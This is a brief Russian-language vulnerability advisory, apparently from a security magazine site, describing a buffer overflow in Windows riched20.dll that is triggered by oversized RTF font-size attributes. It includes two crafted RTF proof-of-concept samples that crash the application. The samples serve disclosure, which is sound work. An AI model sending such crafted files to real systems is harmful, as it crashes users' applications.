Хакер #305. Многошаговые SQL-инъекции
Переполнение буфера обнаружено в Windows
riched20.dll. Удаленный пользователь может аварийно завершить работу приложения.
Security Defence Studio сообщил, что переполнение может быть вызвано специально обработанными атрибутами в RTF файле, когда DLL рисует figure-string ('\fs'). Когда (\fs) устанавливает размер шрифта превышающий 1024 байт, произойдет переполнение буфера. Другие атрибуты могут быть также уязвимы. Пример:
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset1 34 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0
\fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par
}
и еще один:
{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0121111111111111111111111111111111112222
\fs180 www.yoursft.com\fs20\par
}
Использовать уязвимость для выполнения произвольного кода
крайне трудно.